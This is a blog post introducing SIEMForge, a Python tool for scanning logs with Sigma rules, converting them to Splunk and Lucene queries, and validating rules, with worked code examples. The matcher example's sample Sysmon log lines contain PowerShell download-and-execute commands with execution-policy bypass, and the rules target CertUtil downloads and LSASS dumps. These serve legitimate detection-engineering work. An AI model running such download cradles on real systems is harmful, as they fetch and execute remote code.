You don't always have a full SIEM stack at your fingertips. Maybe you're a student spinning up a home lab, a junior SOC analyst triaging logs on a budget, or a pentester who just needs to check some Sysmon logs against known attack patterns. Standing up Splunk or Elastic just to run a few detection rules feels like overkill.
That's why I built SIEMForge — a portable detection toolkit that lets you scan logs against Sigma rules, convert detections to Splunk/Elastic/Kibana queries, validate rule syntax, and map your coverage to the MITRE ATT&CK framework. All from the command line. No SIEM required.
What SIEMForge Actually Does
At its core, SIEMForge is a Python CLI tool with four main capabilities:
1. Log Scanning Without a SIEM
Feed it a JSON, JSONL, syslog, or CSV log file and it executes Sigma detection rules against it locally:
python -m siemforge --scan /var/log/sysmon/events.json
It ships with 10 pre-built Sigma rules covering techniques like suspicious PowerShell downloads (T1059.001), LSASS memory dumps (T1003.001), CertUtil abuse (T1105), and scheduled task persistence (T1053.005).
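What a local scan like this has to do under the hood, shown as an added example that is not SIEMForge's code: a minimal matcher that parses the rule's condition into a small tree, applies the contains/endswith modifiers with Sigma's case-insensitive semantics, and runs a constructed process-creation rule over four constructed Sysmon events. The rule, its allow-list filter on ccmexec.exe and the log lines are all made up for the example; the rule is written as the dict PyYAML would load from the YAML file, so the block runs without PyYAML installed.

```python
"""Added example (not SIEMForge code): evaluate one Sigma rule's detection block
against JSONL events in memory, which is what a SIEM-less scan boils down to."""
import json
import re

# Constructed rule, written as the dict PyYAML's safe_load() returns for the YAML.
# logsource is kept for realism; this matcher ignores it and relies on the fields.
RULE = {
    "title": "Suspicious PowerShell download cradle",
    "tags": ["attack.execution", "attack.t1059.001"],
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {
        "selection": {"Image|endswith": "\\powershell.exe",
                      "CommandLine|contains": ["-ep bypass", "DownloadString"]},
        "filter": {"ParentImage|endswith": "\\ccmexec.exe"},   # assumed SCCM allow-list
        "condition": "selection and not filter",
    },
}

# Constructed Sysmon Event ID 1 records, one JSON object per line. Line 2 is
# dropped by the filter; line 4 (pwsh.exe) is a gap this rule does not cover.
LOG_LINES = r"""
{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -EP Bypass -c IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a.ps1')"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\CCM\\CcmExec.exe", "CommandLine": "powershell.exe -ep bypass -file C:\\Windows\\CCM\\inventory.ps1"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -NoProfile -Command Get-Process"}
{"EventID": 1, "Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "pwsh.exe -ep bypass -c (New-Object Net.WebClient).DownloadString('http://10.0.0.5/b.ps1')"}
"""


def parse_condition(text):
    """Recursive descent over a Sigma condition: and/or/not, parentheses and
    selection names ('1 of sel*' quantifiers are not handled). Returns tuples."""
    toks = re.findall(r"\(|\)|\w+", text)

    def binary(op, operand):                  # left-associative chain of one operator
        node = operand()
        while toks[:1] == [op]:
            toks.pop(0)
            node = (op, node, operand())
        return node

    def factor():
        tok = toks.pop(0)
        if tok == "not":
            return ("not", factor())
        if tok == "(":
            node = expr()
            assert toks.pop(0) == ")", "unbalanced parentheses"
            return node
        return ("sel", tok)

    def expr():                               # precedence: not > and > or
        return binary("or", lambda: binary("and", factor))

    tree = expr()
    assert not toks, f"unparsed tokens in condition: {toks}"
    return tree


def _value_matches(mods, pattern, value):
    v, p = str(value).lower(), str(pattern).lower()      # Sigma matches case-insensitively
    if "contains" in mods:
        return p in v
    if "startswith" in mods:
        return v.startswith(p)
    if "endswith" in mods:
        return v.endswith(p)
    rx = re.escape(p).replace(r"\*", ".*").replace(r"\?", ".")   # plain value: * and ? wildcards
    return re.fullmatch(rx, v, re.S) is not None


def _selection_matches(sel, event):
    for key, pats in sel.items():                         # every key of a selection must match
        field, *mods = key.split("|")
        hits = [field in event and _value_matches(mods, p, event[field])
                for p in (pats if isinstance(pats, list) else [pats])]
        if not (all(hits) if "all" in mods else any(hits)):   # value list: OR unless |all
            return False
    return True


def evaluate(node, detection, event):
    if node[0] == "sel":
        return _selection_matches(detection[node[1]], event)
    if node[0] == "not":
        return not evaluate(node[1], detection, event)
    left, right = (evaluate(n, detection, event) for n in node[1:])
    return (left and right) if node[0] == "and" else (left or right)


def scan(rule, jsonl):
    """Return the 1-based line numbers of the events the rule fires on."""
    det = rule["detection"]
    tree = parse_condition(det["condition"])
    return [n for n, line in enumerate(jsonl.strip().splitlines(), 1)
            if evaluate(tree, det, json.loads(line))]


if __name__ == "__main__":
    print("rule fires on lines:", scan(RULE, LOG_LINES))   # [1]
```

Running it reports that only line 1 fires. Line 2 carries the same download cradle but is parented by the assumed SCCM client and drops out through the filter, and line 4 is the reason scanning sample logs locally is worth doing before a rule ships: pwsh.exe slips past an Image|endswith selection on \powershell.exe entirely, so the rule as written is blind to PowerShell 7.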
2. Multi-Backend Rule Conversion
Need to move a Sigma rule into your production SIEM? SIEMForge converts to Splunk SPL, Elasticsearch Lucene, and Kibana KQL:
python -m siemforge --convert splunk rules/sigma/proc_creation_suspicious_powershell.yml
This spits out ready-to-paste queries: no manual translation, no syntax guessing. One thing still worth checking before you paste: the field names in the output have to match how your index actually ingests Sysmon (raw Sysmon field names versus ECS), so confirm the mapping against a real event from your own index first.
3. Rule Validation
Before deploying rules to production, validate them:
python -m siemforge --validate rules/sigma/
This catches YAML formatting issues, missing required fields, and structural problems before they break your detection pipeline.
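Checks of this kind, as an added example that is not SIEMForge's own validator: beyond the required top-level fields, it confirms that every selection named in the condition is actually defined (expanding 1 of filter_* style quantifiers as globs against the defined names) and flags technique tags written as a bare T1105 instead of attack.t1105, a mistake that any coverage map keyed on attack.* tags would silently skip. Both rules are constructed for the example.

```python
"""Added example (not SIEMForge code): the structural checks a Sigma rule should pass
before it reaches a detection pipeline, run on one sound rule and one broken one."""
import re

REQUIRED = ("title", "logsource", "detection")
KEYWORDS = {"and", "or", "not", "of", "all", "them"}


def validate(rule):
    """Return a list of problems; an empty list means the rule is structurally sound."""
    errors = [f"missing required field: {key}" for key in REQUIRED if key not in rule]
    det = rule.get("detection")
    if not isinstance(det, dict) or "condition" not in det:
        return errors + ["detection.condition is missing"]
    selections = [name for name in det if name != "condition"]
    if not selections:
        errors.append("detection defines no selection")
    # Every identifier in the condition must name a selection. Quantifier patterns
    # such as '1 of filter_*' are expanded as globs against the defined names.
    for ref in re.findall(r"[\w*]+", str(det["condition"])):
        if ref in KEYWORDS or ref.isdigit():
            continue
        glob = re.escape(ref).replace(r"\*", ".*")
        if not any(re.fullmatch(glob, name) for name in selections):
            errors.append(f"condition references undefined selection: {ref}")
    # A bare technique id (T1105) instead of attack.t1105 is the classic tag mistake;
    # a coverage map that keys on attack.* tags would silently skip the rule.
    for tag in rule.get("tags", []):
        if re.fullmatch(r"[Tt]\d{4}(\.\d{3})?", str(tag)):
            errors.append(f"technique tag lacks the attack. prefix: {tag}")
    return errors


# Constructed rules: one sound, one carrying the mistakes a copy-paste edit leaves behind.
GOOD = {
    "title": "CertUtil download via urlcache",
    "logsource": {"product": "windows", "category": "process_creation"},
    "tags": ["attack.command_and_control", "attack.t1105"],
    "detection": {
        "selection": {"Image|endswith": "\\certutil.exe", "CommandLine|contains": "urlcache"},
        "filter_updater": {"ParentImage|endswith": "\\wuauclt.exe"},   # assumed allow-list
        "condition": "selection and not 1 of filter_*",
    },
}
BAD = {
    "title": "CertUtil download via urlcache",
    "tags": ["T1105"],
    "detection": {"selection": {"Image|endswith": "\\certutil.exe"},
                  "condition": "selection and not filter"},
}

if __name__ == "__main__":
    print("good:", validate(GOOD) or "ok")
    for problem in validate(BAD):
        print("bad:", problem)
```

The undefined-selection check is the one that matters most in practice: a YAML file with a renamed filter block still loads cleanly and still passes a schema check, and the failure only shows up as a rule that either never fires or fires on everything.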
4. MITRE ATT&CK Coverage Mapping
Visualize which techniques your rule set covers:
python -m siemforge --mitre rules/sigma/
This is huge for gap analysis — you can immediately see where your detection coverage is thin.
A Closer Look: The Converter Architecture
The part I'm most proud of is the converter module. Each SIEM backend has its own translation layer under siemforge/converters/:
siemforge/converters/
├── splunk.py
├── elastic.py
└── kibana.py
Each converter takes a parsed Sigma rule (field mappings, detection logic, conditions) and outputs the target query language. The tricky part was handling Sigma's conditional logic: conditions such as selection and not filter (Sigma's own lowercase syntax), combined with nested field conditions, have to be parenthesized correctly for each backend's precedence rules.
For example, a Sigma rule detecting suspicious PowerShell downloads becomes Splunk SPL like:
index=windows source="WinEventLog:Microsoft-Windows-Sysmon/Operational"
EventCode=1
CommandLine="*powershell*" AND (CommandLine="*-ep bypass*" OR CommandLine="*DownloadString*")
But the same rule in Elasticsearch Lucene looks like:
event.code:1 AND process.command_line:(*powershell* AND (*\-ep\ bypass* OR *DownloadString*))
Field names change (raw Sysmon names on the Splunk side, ECS names on the Elastic side), quoting rules change, wildcard syntax changes. The converter handles all of this. The escaped space in *\-ep\ bypass* is the detail to check in any converter's Lucene output: query_string syntax splits a bare term at whitespace, so an unescaped *-ep bypass* becomes two terms and the query matches far more than the rule intends, while wrapping it in double quotes turns it into a phrase in which the wildcards are literal. Leading wildcards such as *powershell* also rely on the backend allowing them, which Elasticsearch's query_string does by default.
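The same translation layer written out as an added example (not SIEMForge's converter module): one function walks the parsed condition tree and emits either backend, with the field-name mapping, the value escaping and the per-field grouping isolated in two helpers. The detection block and the ECS field mapping are constructed for the example, and the condition is given already parsed into nested tuples, since the parsing step is the same for every backend.

```python
"""Added example (not SIEMForge code): render one parsed Sigma detection as Splunk
SPL and as Elasticsearch Lucene, changing field names, escaping and grouping per backend."""
import re

# Constructed detection block as PyYAML loads it, with its condition
# 'selection and not filter' already parsed into nested tuples (the parse step is
# assumed here; a small recursive-descent parser produces exactly this shape).
DETECTION = {
    "selection": {"Image|endswith": "\\powershell.exe",
                  "CommandLine|contains": ["-ep bypass", "DownloadString"]},
    "filter": {"ParentImage|endswith": "\\ccmexec.exe"},   # assumed SCCM allow-list
}
CONDITION = ("and", ("sel", "selection"), ("not", ("sel", "filter")))

# Splunk keeps the Sysmon field names; the Lucene output uses ECS names
# (an assumed mapping covering only the fields this rule touches).
ECS = {"Image": "process.executable", "ParentImage": "process.parent.executable",
       "CommandLine": "process.command_line"}
HEAD = {"splunk": 'index=windows source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 ',
        "lucene": "event.code:1 AND "}
# Lucene query_string specials that need a backslash; '*' and '?' are left as wildcards.
LUCENE_SPECIAL = re.compile(r'([+\-=&|><!(){}\[\]^"~:\\/ ])')


def render_value(backend, mods, pattern):
    p = str(pattern)
    if backend == "splunk":          # quoted value: backslash and double quote are escaped
        p = p.replace("\\", "\\\\").replace('"', '\\"')
    else:                            # bare term: escape specials, space included, otherwise
        p = LUCENE_SPECIAL.sub(r"\\\1", p)   # '*-ep bypass*' is parsed as two separate terms
    if "contains" in mods:
        p = f"*{p}*"
    elif "startswith" in mods:
        p = f"{p}*"
    elif "endswith" in mods:
        p = f"*{p}"
    return f'"{p}"' if backend == "splunk" else p


def render_selection(backend, sel):
    parts = []
    for key, pats in sel.items():
        field, *mods = key.split("|")
        name = field if backend == "splunk" else ECS.get(field, field)
        vals = [render_value(backend, mods, p) for p in (pats if isinstance(pats, list) else [pats])]
        join = " AND " if "all" in mods else " OR "          # value list: OR unless |all
        if len(vals) == 1:
            parts.append(f"{name}={vals[0]}" if backend == "splunk" else f"{name}:{vals[0]}")
        elif backend == "splunk":
            parts.append("(" + join.join(f"{name}={v}" for v in vals) + ")")
        else:
            parts.append(f"{name}:({join.join(vals)})")       # Lucene groups values under one field
    return parts[0] if len(parts) == 1 else "(" + " AND ".join(parts) + ")"


def convert(detection, tree, backend):
    """Render the condition tree for 'splunk' (SPL) or 'lucene' (query_string syntax)."""
    def walk(node):
        if node[0] == "sel":
            return render_selection(backend, detection[node[1]])
        if node[0] == "not":
            return "NOT " + walk(node[1])
        return "(" + f" {node[0].upper()} ".join(walk(n) for n in node[1:]) + ")"
    return HEAD[backend] + walk(tree)


if __name__ == "__main__":
    for backend in ("splunk", "lucene"):
        print(backend, "=>", convert(DETECTION, CONDITION, backend))
```

The Lucene renderer escapes every query_string special character including the space, which is what keeps *-ep bypass* a single term; the Splunk renderer instead quotes the value and escapes backslashes and double quotes inside it. Both outputs carry more parentheses than the hand-written queries above, which is the safe choice for a converter: a redundant pair costs nothing, a missing pair silently changes what the rule matches.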
Why I Built It
I'm a cybersecurity student, and I kept running into the same problem: I wanted to practice threat detection and log analysis, but every tutorial assumed you had a full Splunk or Elastic deployment. Setting up those stacks takes hours and eats resources on a student laptop.
SIEMForge lets me (and anyone else) practice detection engineering with just Python and a log file. It's the tool I wished existed when I started learning.
Getting Started
git clone https://github.com/TiltedLunar123/SIEMForge.git
cd SIEMForge
pip install pyyaml
python -m siemforge --scan samples/test_logs.json
The test suite has 138 tests if you want to poke around the internals:
pip install -r requirements-dev.txt
pytest tests/ -v
What's Next
I'm planning to add more Sigma rules, support additional log formats, and potentially add a web UI for the MITRE coverage matrix. If you're into detection engineering or just want a lightweight way to work with Sigma rules, give it a try and let me know what you think.
GitHub: https://github.com/TiltedLunar123/SIEMForge
If this is useful, drop a star — it helps more than you think.